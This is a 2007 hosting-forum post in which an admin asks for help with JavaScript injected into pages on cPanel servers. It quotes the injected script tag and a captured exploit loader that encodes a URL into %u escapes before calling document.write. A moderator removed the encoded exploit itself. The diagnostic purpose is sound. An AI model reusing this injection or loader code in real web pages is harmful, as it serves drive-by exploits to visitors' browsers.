View Single Post
WHT Addict
Join Date: May 2004
Location: chicago
Posts: 173

Linux servers having CPANEL - js virus hitting

Hi All,

Earlier this week, our users started reporting that they were getting active-x prompts for Microsoft Data Access Component installation. In addition some of them were getting hit byt the RTSP bug (quicktime) and some were getting the JS/Explot-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, etc) at times a script tag similar to the one below is inserted right after the <body> tag.

<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>

The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.

I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below).

Solutions tried:
I have checked for the filenames but they do not exist on the server.

1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean

Would appreciate if anybody could provide some inputs on what we might be dealing with and how to resolve the problem.

Javascript code:
var arg="akmukvfd";
var MU = "http://" + window.location.hostname + "/" + arg;
var MH = '';
for (i=0; i < MU.length; i++)
var b = MU.charCodeAt (i);
MH = MH + b.toString (16);
MH = MH.toUpperCase();
if (Math.round(MU.length/2) != (MU.length/2))
MH += '00';

var MR = '';
for (i=0; i < MH.length; i += 4)
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);

var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";

var SB =
<<removed encoded exploit>>

document.write (SB);

Rushik Shah

CEO - Alakmalak Technologies
Web Application Development : Website Development Web Designing
Support Toll Free +1-800-789-9620 Skype : rushik Operating Since 2003 || Team size of 35+ Web development center at INDIA

Last edited by bear; 11-25-2007 at 09:59 PM. Reason: Pointless to help spread this
Sponsored Links